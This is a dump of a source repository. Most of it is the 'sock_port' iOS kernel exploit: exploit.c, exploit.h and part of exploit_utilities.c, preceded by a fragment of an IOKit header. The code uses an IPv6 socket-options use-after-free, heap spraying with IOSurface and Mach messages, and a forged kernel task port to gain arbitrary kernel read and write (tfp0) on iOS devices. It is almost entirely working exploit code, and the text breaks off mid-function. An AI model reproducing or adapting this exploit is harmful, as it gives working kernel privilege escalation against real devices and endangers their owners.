MACH_KERNEL\n \n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n typedef mach_port_t io_object_t;\n#endif /* __IOKIT_PORTS_DEFINED__ */\n \n#include \n \n typedef io_object_t io_connect_t;\n typedef io_object_t io_enumerator_t;\n typedef io_object_t io_iterator_t;\n typedef io_object_t io_registry_entry_t;\n typedef io_object_t io_service_t;\n \n#define IO_OBJECT_NULL ((io_object_t) 0)\n \n#endif /* MACH_KERNEL */\n \n // IOConnectMapMemory memoryTypes\n enum {\n kIODefaultMemoryType = 0\n };\n \n enum {\n kIODefaultCache = 0,\n kIOInhibitCache = 1,\n kIOWriteThruCache = 2,\n kIOCopybackCache = 3,\n kIOWriteCombineCache = 4,\n kIOCopybackInnerCache = 5,\n kIOPostedWrite = 6\n };\n \n // IOMemory mapping options\n enum {\n kIOMapAnywhere = 0x00000001,\n \n kIOMapCacheMask = 0x00000700,\n kIOMapCacheShift = 8,\n kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,\n kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,\n kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift,\n kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift,\n kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift,\n kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift,\n kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift,\n \n kIOMapUserOptionsMask = 0x00000fff,\n \n kIOMapReadOnly = 0x00001000,\n \n kIOMapStatic = 0x01000000,\n kIOMapReference = 0x02000000,\n kIOMapUnique = 0x04000000,\n kIOMapPrefault = 0x10000000,\n kIOMapOverwrite = 0x20000000\n };\n \n /*! @enum Scale Factors\n @discussion Used when a scale_factor parameter is required to define a unit of time.\n @constant kNanosecondScale Scale factor for nanosecond based times.\n @constant kMicrosecondScale Scale factor for microsecond based times.\n @constant kMillisecondScale Scale factor for millisecond based times.\n @constant kTickScale Scale factor for the standard (100Hz) tick.\n @constant kSecondScale Scale factor for second based times. */\n \n enum {\n kNanosecondScale = 1,\n kMicrosecondScale = 1000,\n kMillisecondScale = 1000 * 1000,\n kSecondScale = 1000 * 1000 * 1000,\n kTickScale = (kSecondScale / 100)\n };\n \n enum {\n kIOConnectMethodVarOutputSize = -3\n };\n \n /* compatibility types */\n \n \n typedef unsigned int IODeviceNumber;\n \n \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n" }, { "path": "Exploits/sock_port/exploit.c", "content": "//\n// exploit.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"exploit.h\"\nuint64_t current_task;\nuint64_t kernel_slide = 0;\n// utilities to manipulate sockets\nint set_minmtu(int sock, int *minmtu) {\n return setsockopt(sock, IPPROTO_IPV6, IPV6_USE_MIN_MTU, minmtu, sizeof(*minmtu));\n}\n\nint get_minmtu(int sock, int *minmtu) {\n socklen_t size = sizeof(*minmtu);\n return getsockopt(sock, IPPROTO_IPV6, IPV6_USE_MIN_MTU, minmtu, &size);\n}\n\nint get_prefertempaddr(int sock, int *prefertempaddr) {\n socklen_t size = sizeof(*prefertempaddr);\n return getsockopt(sock, IPPROTO_IPV6, IPV6_PREFER_TEMPADDR, prefertempaddr, &size);\n}\n\nint set_prefertempaddr(int sock, int *prefertempaddr) {\n return setsockopt(sock, IPPROTO_IPV6, IPV6_PREFER_TEMPADDR, prefertempaddr, sizeof(*prefertempaddr));\n}\n\nint get_pktinfo(int sock, struct in6_pktinfo *pktinfo) {\n socklen_t size = sizeof(*pktinfo);\n return getsockopt(sock, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo, &size);\n}\n\nint set_pktinfo(int sock, struct in6_pktinfo *pktinfo) {\n return setsockopt(sock, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo, sizeof(*pktinfo));\n}\n\n// free the pktopts struct of the socket to get ready for UAF\nint free_socket_options(int sock) {\n return disconnectx(sock, 0, 0);\n}\n\n// return a socket we can UAF on\nint get_socket() {\n int sock = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);\n if (sock < 0) {\n printf(\"Can't get socket, error %d (%s)\\n\", errno, strerror(errno));\n return -1;\n }\n \n // allow setsockopt() after disconnect()\n struct so_np_extensions sonpx = {.npx_flags = SONPX_SETOPTSHUT, .npx_mask = SONPX_SETOPTSHUT};\n int ret = setsockopt(sock, SOL_SOCKET, SO_NP_EXTENSIONS, &sonpx, sizeof(sonpx));\n if (ret) {\n printf(\"setsockopt() failed, error %d (%s)\\n\", errno, strerror(errno));\n return -1;\n }\n \n return sock;\n}\n\n// return a socket ready for UAF\nint get_socket_with_dangling_options() {\n int socket = get_socket();\n \n int minmtu = -1;\n set_minmtu(socket, &minmtu);\n \n free_socket_options(socket);\n \n return socket;\n}\n\nmach_port_t new_port() {\n mach_port_t port;\n kern_return_t rv = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n if (rv) {\n printf(\"Failed to allocate port (%s)\\n\", mach_error_string(rv));\n return MACH_PORT_NULL;\n }\n rv = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n if (rv) {\n printf(\"Failed to insert right (%s)\\n\", mach_error_string(rv));\n return MACH_PORT_NULL;\n }\n return port;\n}\n\n// first primitive: leak the kernel address of a mach port\nuint64_t find_port_via_uaf(mach_port_t port, int disposition) {\n // here we use the uaf as an info leak\n int sock = get_socket_with_dangling_options();\n \n for (int i = 0; i < 0x10000; i++) {\n // since the UAFd field is 192 bytes, we need 192/sizeof(uint64_t) pointers\n mach_port_t p = fill_kalloc_with_port_pointer(port, 192/sizeof(uint64_t), MACH_MSG_TYPE_COPY_SEND);\n \n int mtu;\n int pref;\n get_minmtu(sock, &mtu); // this is like doing rk32(options + 180);\n get_prefertempaddr(sock, &pref); // this like rk32(options + 184);\n\n uint64_t ptr = (((uint64_t)mtu << 32) & 0xffffffff00000000) | ((uint64_t)pref & 0x00000000ffffffff);\n \n if (mtu >= 0xffffff00 && mtu != 0xffffffff && pref != 0xdeadbeef) {\n mach_port_destroy(mach_task_self(), p);\n close(sock);\n return ptr;\n }\n mach_port_destroy(mach_task_self(), p);\n }\n \n // close that socket.\n close(sock);\n return 0;\n}\n\n// function to cache our task port kernel address\nuint64_t task_self_addr() {\n static uint64_t cached_task_self_addr = 0;\n if (cached_task_self_addr) return cached_task_self_addr;\n else return find_port_via_uaf(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);\n}\n\n// second primitive: read 20 bytes from addr\nvoid* read_20_via_uaf(uint64_t addr) {\n // create a bunch of sockets\n int sockets[128];\n for (int i = 0; i < 128; i++) {\n sockets[i] = get_socket_with_dangling_options();\n }\n \n // create a fake struct with our dangling port address as its pktinfo\n struct ip6_pktopts *fake_opts = calloc(1, sizeof(struct ip6_pktopts));\n fake_opts->ip6po_minmtu = 0x41424344; // give a number we can recognize\n *(uint32_t*)((uint64_t)fake_opts + 164) = 0x41424344; // on iOS 10, offset is different\n fake_opts->ip6po_pktinfo = (struct in6_pktinfo*)addr;\n \n bool found = false;\n int found_at = -1;\n \n for (int i = 0; i < 20; i++) { // iterate through the sockets to find if we overwrote one\n spray_IOSurface((void *)fake_opts, sizeof(struct ip6_pktopts));\n \n for (int j = 0; j < 128; j++) {\n int minmtu = -1;\n get_minmtu(sockets[j], &minmtu);\n if (minmtu == 0x41424344) { // found it!\n found_at = j; // save its index\n found = true;\n break;\n }\n }\n if (found) break;\n }\n \n free(fake_opts);\n \n if (!found) {\n printf(\"Failed to read kernel\\n\");\n return 0;\n }\n \n for (int i = 0; i < 128; i++) {\n if (i != found_at) {\n close(sockets[i]);\n }\n }\n \n void *buf = malloc(sizeof(struct in6_pktinfo));\n get_pktinfo(sockets[found_at], (struct in6_pktinfo *)buf);\n close(sockets[found_at]);\n \n return buf;\n}\n\nuint64_t rk64_via_uaf(uint64_t addr) {\n void *buf = read_20_via_uaf(addr);\n if (buf) {\n uint64_t r = *(uint64_t*)buf;\n free(buf);\n return r;\n }\n return 0;\n}\n\n// third primitive: free a kalloced object at an arbitrary address\nint free_via_uaf(uint64_t addr) {\n // create a bunch of sockets\n int sockets[128];\n for (int i = 0; i < 128; i++) {\n sockets[i] = get_socket_with_dangling_options();\n }\n \n // create a fake struct with our dangling port address as its pktinfo\n struct ip6_pktopts *fake_opts = calloc(1, sizeof(struct ip6_pktopts));\n fake_opts->ip6po_minmtu = 0x41424344; // give a number we can recognize\n *(uint32_t*)((uint64_t)fake_opts + 164) = 0x41424344; // on iOS 10, offset is different\n fake_opts->ip6po_pktinfo = (struct in6_pktinfo*)addr;\n \n bool found = false;\n int found_at = -1;\n \n for (int i = 0; i < 20; i++) { // iterate through the sockets to find if we overwrote one\n spray_IOSurface((void *)fake_opts, sizeof(struct ip6_pktopts));\n \n for (int j = 0; j < 128; j++) {\n int minmtu = -1;\n get_minmtu(sockets[j], &minmtu);\n if (minmtu == 0x41424344) { // found it!\n found_at = j; // save its index\n found = true;\n break;\n }\n }\n if (found) break;\n }\n \n free(fake_opts);\n \n if (!found) {\n printf(\"failed to setup freeing primitive\\n\");\n return -1;\n }\n \n for (int i = 0; i < 128; i++) {\n if (i != found_at) {\n close(sockets[i]);\n }\n }\n struct in6_pktinfo *buf = malloc(sizeof(struct in6_pktinfo));\n memset(buf, 0, sizeof(struct in6_pktinfo));\n \n int ret = set_pktinfo(sockets[found_at], buf);\n free(buf);\n return ret;\n}\n\n\nstatic inline uint32_t mach_port_waitq_flags() {\n union waitq_flags waitq_flags = {};\n waitq_flags.waitq_type = WQT_QUEUE;\n waitq_flags.waitq_fifo = 1;\n waitq_flags.waitq_prepost = 0;\n waitq_flags.waitq_irq = 0;\n waitq_flags.waitq_isvalid = 1;\n waitq_flags.waitq_turnstile_or_port = 1;\n return waitq_flags.flags;\n}\n\nuint64_t self_port_addr;\nmach_port_t get_tfp0() {\n printf(\"The sock_port exploit started!\\n\");\n \n offsets_init();\n \n kern_return_t ret = init_IOSurface();\n if (ret) {\n printf(\"ERROR: SockPort: can't init IOSurface!\\n\");\n return MACH_PORT_NULL;\n }\n printf(\"SockPort: Initialized IOSurface\\n\");\n\n bool SMAP = false;\n\n if (pagesize == 0x4000) {\n struct utsname a;\n uname(&a);\n if (!strstr(a.machine, \"iPad5,\") && !strstr(a.machine, \"iPad6,\") && !strstr(a.machine, \"iPhone8,\")) {\n printf(\"SockPort: Detected SMAP device!\\n\");\n SMAP = true;\n }\n }\n \n self_port_addr = task_self_addr(); // port leak primitive\n if (!self_port_addr) {\n printf(\"ERROR: SockPort: failed to leak our task port address!\\n\");\n goto err;\n }\n \n printf(\"SockPort: Our task port: 0x%llx\\n\", self_port_addr);\n \n // kernel read primitive\n uint64_t ipc_space_kernel = rk64_via_uaf(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));\n if (!ipc_space_kernel) {\n printf(\"ERROR: SockPort: kernel read primitive failed!\\n\");\n goto err;\n }\n printf(\"SockPort: ipc_space_kernel: 0x%llx\\n\", ipc_space_kernel);\n \n // here we'll create a pair of pipes (4 file descriptors in total)\n // first pipe, used to overwrite a port pointer in a mach message\n int fds[2];\n ret = pipe(fds);\n if (ret) {\n printf(\"ERROR: SockPort: failed to create pipe\\n\");\n goto err;\n }\n \n // make the buffer of the first pipe 0x10000 bytes (this could be other sizes, but know that kernel does some calculations on how big this gets, i.e. when I made the buffer 20 bytes, it'd still go to kalloc.512\n uint8_t pipebuf[0x10000];\n memset(pipebuf, 0, 0x10000);\n \n write(fds[1], pipebuf, 0x10000); // do write() to allocate the buffer on the kernel\n read(fds[0], pipebuf, 0x10000); // do read() to reset buffer position\n write(fds[1], pipebuf, 8); // write 8 bytes so later we can read the first 8 bytes (used to verify if spraying worked)\n \n // second pipe, used for our fake port\n int port_fds[2] = {-1, -1};\n if (SMAP) {\n ret = pipe(port_fds);\n if (ret) {\n printf(\"ERROR: SockPort: failed to create pipe\\n\");\n goto err;\n }\n }\n \n // create fake port and fake task, put fake_task right after fakeport\n kport_t *fakeport = malloc(sizeof(kport_t) + 0x600);\n ktask_t *fake_task = (ktask_t *)((uint64_t)fakeport + sizeof(kport_t));\n bzero((void *)fakeport, sizeof(kport_t) + 0x600);\n \n fake_task->ref_count = 0xff;\n \n fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;\n fakeport->ip_references = 0xd00d;\n fakeport->ip_lock.type = 0x11;\n fakeport->ip_messages.port.receiver_name = 1;\n fakeport->ip_messages.port.msgcount = 0;\n fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;\n fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();\n fakeport->ip_srights = 99;\n fakeport->ip_kobject = 0;\n fakeport->ip_receiver = ipc_space_kernel;\n\n if (SMAP) {\n write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\n }\n \n // find the pipe buffers for both pipes\n \n#define rk64_check(addr) ({ uint64_t r; r = rk64_via_uaf(addr); if (!r) { usleep(100); r = rk64_via_uaf(addr); if (!r) { printf(\"ERROR: failed to read from '\"#addr\"'\\n\"); goto err;}}; r;})\n \n uint64_t task = rk64_check(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n uint64_t proc = rk64_check(task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n uint64_t p_fd = rk64_check(proc + koffset(KSTRUCT_OFFSET_PROC_P_FD));\n uint64_t fd_ofiles = rk64_check(p_fd + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));\n \n uint64_t fproc = rk64_check(fd_ofiles + fds[0] * 8);\n uint64_t f_fglob = rk64_check(fproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));\n uint64_t fg_data = rk64_check(f_fglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));\n uint64_t pipe_buffer = rk64_check(fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER));\n printf(\"SockPort: pipe buffer: 0x%llx\\n\", pipe_buffer);\n\n uint64_t port_fg_data = 0;\n uint64_t port_pipe_buffer = 0;\n \n if (SMAP) {\n fproc = rk64_check(fd_ofiles + port_fds[0] * 8);\n f_fglob = rk64_check(fproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));\n port_fg_data = rk64_check(f_fglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));\n port_pipe_buffer = rk64_check(port_fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER));\n printf(\"SockPort: second pipe buffer: 0x%llx\\n\", port_pipe_buffer);\n }\n \n if (SMAP) {\n // align ip_kobject at our fake task, so the address of fake port + sizeof(kport_t)\n fakeport->ip_kobject = port_pipe_buffer + sizeof(kport_t);\n }\n else {\n fakeport->ip_kobject = (uint64_t)fake_task;\n }\n \n if (SMAP) {\n // update our pipe buffer\n write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n }\n \n // create a new port, this one we'll use for tfp0\n mach_port_t target = new_port();\n if (!target) {\n printf(\"ERROR: SockPort: failed to allocate port\\n\");\n goto err;\n }\n \n // get its kernel address\n uint64_t target_addr = find_port_via_uaf(target, MACH_MSG_TYPE_COPY_SEND);\n if (!target_addr) {\n printf(\"ERROR: SockPort: failed to leak target port address\\n\");\n goto err;\n }\n \n // free the first pipe buffer\n ret = free_via_uaf(pipe_buffer);\n if (ret) {\n printf(\"ERROR: SockPort: failed to free pipe buffer\\n\");\n goto err;\n }\n\n // reallocate it while filling it with a mach message containing send rights to our target port\n mach_port_t p = MACH_PORT_NULL;\n for (int i = 0; i < 10000; i++) {\n \n // pipe is 0x10000 bytes so make 0x10000/8 pointers and save result as we'll use later\n p = fill_kalloc_with_port_pointer(target, 0x10000/8, MACH_MSG_TYPE_COPY_SEND);\n \n // check if spraying worked by reading first 8 bytes\n uint64_t addr;\n read(fds[0], &addr, 8);\n if (addr == target_addr) { // if we see the address of our port, it worked\n break;\n }\n write(fds[1], &addr, 8); // reset buffer position\n \n mach_port_destroy(mach_task_self(), p); // spraying didn't work, so free port\n p = MACH_PORT_NULL;\n }\n\n if (!p) {\n printf(\"ERROR: SockPort: spraying failed!\");\n goto err;\n }\n \n if (SMAP) {\n // spraying worked, now the pipe buffer is filled with pointers to our target port\n // overwrite the first pointer with our second pipe buffer, which contains the fake port\n write(fds[1], &port_pipe_buffer, 8);\n }\n else {\n write(fds[1], &fakeport, 8);\n }\n \n // receive the message from fill_kalloc_with_port_pointers back, since that message contains a send right and we overwrote the pointer of the first port, we now get a send right to the fake port!\n struct ool_msg *msg = malloc(0x1000);\n ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, 0x1000, p, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n if (ret) {\n free(msg);\n printf(\"ERROR: SockPort: mach_msg() failed: %d (%s)\\n\", ret, mach_error_string(ret));\n goto err;\n }\n \n mach_port_t *received_ports = msg->ool_ports.address;\n mach_port_t our_port = received_ports[0]; // fake port!\n free(msg);\n \n uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n \n#define kr32(addr, value)\\\n if (SMAP) {\\\n read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\\\n }\\\n *read_addr_ptr = addr - koffset(KSTRUCT_OFFSET_PROC_PID);\\\n if (SMAP) {\\\n write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\\\n }\\\n value = 0x0;\\\n ret = pid_for_task(our_port, (int *)&value);\n \n uint32_t read64_tmp;\n#define kr64(addr, value)\\\n kr32(addr + 0x4, read64_tmp);\\\n kr32(addr, value);\\\n value = value | ((uint64_t)read64_tmp << 32)\n \n uint64_t struct_task;\n kr64(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), struct_task);\n if (!struct_task) {\n printf(\"ERROR: SockPort: kernel read failed!\\n\");\n goto err;\n }\n \n printf(\"SockPort: READING VIA FAKE PORT WORKED? 0x%llx\\n\", struct_task);\n printf(\"SockPort: Let's steal that kernel task port!\\n\");\n \n // tfp0!\n \n uint64_t kernel_vm_map = 0;\n \n while (struct_task != 0) {\n uint64_t bsd_info;\n kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO), bsd_info);\n if (!bsd_info) {\n printf(\"SockPort: kernel read failed!\\n\");\n goto err;\n }\n \n uint32_t pid;\n kr32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID), pid);\n \n if (pid == 0) {\n uint64_t vm_map;\n kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP), vm_map);\n if (!vm_map) {\n printf(\"SockPort: kernel read failed!\\n\");\n goto err;\n }\n \n kernel_vm_map = vm_map;\n break;\n }\n \n kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV), struct_task);\n }\n \n if (!kernel_vm_map) {\n printf(\"SockPort: failed to find kernel's vm_map\\n\");\n goto err;\n }\n \n printf(\"SockPort: kernel_vm_map: 0x%llx\\n\", kernel_vm_map);\n \n read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\n \n fake_task->lock.data = 0x0;\n fake_task->lock.type = 0x22;\n fake_task->ref_count = 100;\n fake_task->active = 1;\n fake_task->map = kernel_vm_map;\n *(uint32_t *)((uint64_t)fake_task + koffset(KSTRUCT_OFFSET_TASK_ITK_SELF)) = 1;\n\n if (SMAP) {\n write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n }\n \n init_kernel_memory(our_port);\n \n uint64_t addr = kalloc(8);\n if (!addr) {\n printf(\"SockPort: seems like tfp0 port didn't work?\\n\");\n goto err;\n }\n \n printf(\"SockPort: allocated: 0x%llx\\n\", addr);\n wk64(addr, 0x4141414141414141);\n uint64_t readb = rk64(addr);\n kfree(addr, 8);\n printf(\"SockPort: read back: 0x%llx\\n\", readb);\n \n if (readb != 0x4141414141414141) {\n printf(\"read back value didn't match\\n\");\n goto err;\n }\n \n printf(\"SockPort: creating safer port\\n\");\n \n mach_port_t new_tfp0 = new_port();\n if (!new_tfp0) {\n printf(\"SockPort: failed to allocate new tfp0 port\\n\");\n goto err;\n }\n \n uint64_t new_addr = find_port(new_tfp0, self_port_addr);\n if (!new_addr) {\n printf(\"SockPort: failed to find new tfp0 port address\\n\");\n goto err;\n }\n \n uint64_t faketask = kalloc(0x600);\n if (!faketask) {\n printf(\"SockPort: failed to kalloc faketask\\n\");\n goto err;\n }\n \n kwrite(faketask, fake_task, 0x600);\n fakeport->ip_kobject = faketask;\n \n kwrite(new_addr, (const void*)fakeport, sizeof(kport_t));\n \n printf(\"SockPort: testing new tfp0 port\\n\");\n \n init_kernel_memory(new_tfp0);\n \n addr = kalloc(8);\n if (!addr) {\n printf(\"SockPort: seems like the new tfp0 port didn't work?\\n\");\n goto err;\n }\n \n printf(\"SockPort: tfp0: 0x%x\\n\", new_tfp0);\n printf(\"SockPort: allocated: 0x%llx\\n\", addr);\n wk64(addr, 0x4141414141414141);\n readb = rk64(addr);\n kfree(addr, 8);\n printf(\"SockPort: read back: 0x%llx\\n\", readb);\n \n if (readb != 0x4141414141414141) {\n printf(\"SockPort: read back value didn't match\\n\");\n goto err;\n }\n \n // clean up port\n current_task = rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n uint64_t task_addr = rk64(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n \n uint32_t port_index = our_port >> 8;\n const int sizeof_ipc_entry_t = 0x18;\n \n wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, 0);\n wk64(is_table + (port_index * sizeof_ipc_entry_t), 0);\n\n wk64(fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER), 0); // freed already via mach_msg()\n \n if (fds[0] > 0) close(fds[0]);\n if (fds[1] > 0) close(fds[1]);\n if (port_fds[0] > 0) close(port_fds[0]);\n if (port_fds[1] > 0) close(port_fds[1]);\n \n free((void *)fakeport);\n deinit_IOSurface();\n return new_tfp0;\n \nerr:\n if (port_fds[0] > 0) close(port_fds[0]);\n if (port_fds[1] > 0) close(port_fds[1]);\n \n deinit_IOSurface();\n return MACH_PORT_NULL;\n}\n" }, { "path": "Exploits/sock_port/exploit.h", "content": "//\n// exploit.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef exploit_h\n#define exploit_h\n\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"exploit_utilities.h\"\n#include \"kernel_memory.h\"\n\n#define IPV6_USE_MIN_MTU 42\n#define IPV6_PKTINFO 46\n#define IPV6_PREFER_TEMPADDR 63\nextern uint64_t current_task;\nextern uint64_t kernel_slide;\nstruct route_in6 {\n struct rtentry *ro_rt;\n struct llentry *ro_lle;\n struct ifaddr *ro_srcia;\n uint32_t ro_flags;\n struct sockaddr_in6 ro_dst;\n};\n\nstruct ip6po_rhinfo {\n struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */\n struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */\n};\n\nstruct ip6po_nhinfo {\n struct sockaddr *ip6po_nhi_nexthop;\n struct route_in6 ip6po_nhi_route; /* Route to the nexthop */\n};\n\nstruct ip6_pktopts {\n struct mbuf *ip6po_m;\n int ip6po_hlim;\n struct in6_pktinfo *ip6po_pktinfo;\n struct ip6po_nhinfo ip6po_nhinfo;\n struct ip6_hbh *ip6po_hbh;\n struct ip6_dest *ip6po_dest1;\n struct ip6po_rhinfo ip6po_rhinfo;\n struct ip6_dest *ip6po_dest2;\n int ip6po_tclass;\n int ip6po_minmtu;\n int ip6po_prefer_tempaddr;\n int ip6po_flags;\n};\n\n#define IO_BITS_ACTIVE 0x80000000\n#define IOT_PORT 0\n#define IKOT_TASK 2\n#define IKOT_CLOCK 25\n#define IKOT_IOKIT_CONNECT 29\n\ntypedef volatile struct {\n uint32_t ip_bits;\n uint32_t ip_references;\n struct {\n uint64_t data;\n uint64_t type;\n } ip_lock; // spinlock\n struct {\n struct {\n struct {\n uint32_t flags;\n uint32_t waitq_interlock;\n uint64_t waitq_set_id;\n uint64_t waitq_prepost_id;\n struct {\n uint64_t next;\n uint64_t prev;\n } waitq_queue;\n } waitq;\n uint64_t messages;\n uint32_t seqno;\n uint32_t receiver_name;\n uint16_t msgcount;\n uint16_t qlimit;\n uint32_t pad;\n } port;\n uint64_t klist;\n } ip_messages;\n uint64_t ip_receiver;\n uint64_t ip_kobject;\n uint64_t ip_nsrequest;\n uint64_t ip_pdrequest;\n uint64_t ip_requests;\n uint64_t ip_premsg;\n uint64_t ip_context;\n uint32_t ip_flags;\n uint32_t ip_mscount;\n uint32_t ip_srights;\n uint32_t ip_sorights;\n} kport_t;\n\ntypedef struct {\n struct {\n uint64_t data;\n uint32_t reserved : 24,\n type : 8;\n uint32_t pad;\n } lock; // mutex lock\n uint32_t ref_count;\n uint32_t active;\n uint32_t halting;\n uint32_t pad;\n uint64_t map;\n} ktask_t;\n\n#define WQT_QUEUE 0x2\n#define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)\n\nunion waitq_flags {\n struct {\n uint32_t /* flags */\n waitq_type:2, /* only public field */\n waitq_fifo:1, /* fifo wakeup policy? */\n waitq_prepost:1, /* waitq supports prepost? */\n waitq_irq:1, /* waitq requires interrupts disabled */\n waitq_isvalid:1, /* waitq structure is valid */\n waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */\n waitq_eventmask:_EVENT_MASK_BITS;\n };\n uint32_t flags;\n};\n\n\nmach_port_t get_tfp0(void);\n\n#endif /* exploit_h */\n" }, { "path": "Exploits/sock_port/exploit_utilities.c", "content": "//\n// exploit_utilities.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"exploit_utilities.h\"\n\n// from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {\n mach_port_t q = MACH_PORT_NULL;\n kern_return_t err;\n err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n if (err != KERN_SUCCESS) {\n printf(\"IOSurface: failed to allocate port\\n\");\n return 0;\n }\n \n mach_port_t* ports = malloc(sizeof(mach_port_t) * count);\n for (int i = 0; i < count; i++) {\n ports[i] = target_port;\n }\n \n struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));\n \n msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);\n msg->hdr.msgh_remote_port = q;\n msg->hdr.msgh_local_port = MACH_PORT_NULL;\n msg->hdr.msgh_id = 0x41414141;\n \n msg->body.msgh_descriptor_count = 1;\n \n msg->ool_ports.address = ports;\n msg->ool_ports.count = count;\n msg->ool_ports.deallocate = 0;\n msg->ool_ports.disposition = disposition;\n msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;\n msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;\n \n err = mach_msg(&msg->hdr,\n MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n msg->hdr.msgh_size,\n 0,\n MACH_PORT_NULL,\n MACH_MSG_TIMEOUT_NONE,\n MACH_PORT_NULL);\n \n if (err != KERN_SUCCESS) {\n printf(\"IOSurface: failed to send message: %s\\n\", mach_error_string(err));\n return MACH_PORT_NULL;\n }\n \n return q;\n}\n\n// Ian Beer\nsize_t message_size_for_kalloc_size(size_t kalloc_size) {\n return ((3 * kalloc_size) / 4) - 0x74;\n}\n\n// Ian Beer\nmach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) {\n mach_port_t q = MACH_PORT_NULL;\n kern_return_t err;\n err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n if (err != KERN_SUCCESS) {\n printf(\"IOSurface: failed to allocate port\\n\");\n return MACH_PORT_NULL;\n }\n \n mach_port_limits_t limits = {0};\n limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;\n err = mach_port_set_attributes(mach_task_self(),\n q,\n MACH_PORT_LIMITS_INFO,\n (mach_port_info_t)&limits,\n MACH_PORT_LIMITS_INFO_COUNT);\n if (err != KERN_SUCCESS) {\n printf(\"IOSurface: failed to increase queue limit\\n\");\n return MACH_PORT_NULL;\n }\n \n mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;\n struct simple_msg *msg = (struct simple_msg *)malloc(msg_size);\n memset(msg, 0, sizeof(struct simple_msg));\n memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);\n \n for (int i = 0; i < 256; i++) {\n msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n msg->hdr.msgh_size = msg_size;\n msg->hdr.msgh_remote_port = q;\n msg->hdr.msgh_local_port = MACH_PORT_NULL;\n msg->hdr.msgh_id = 0x41414142;\n \n err = 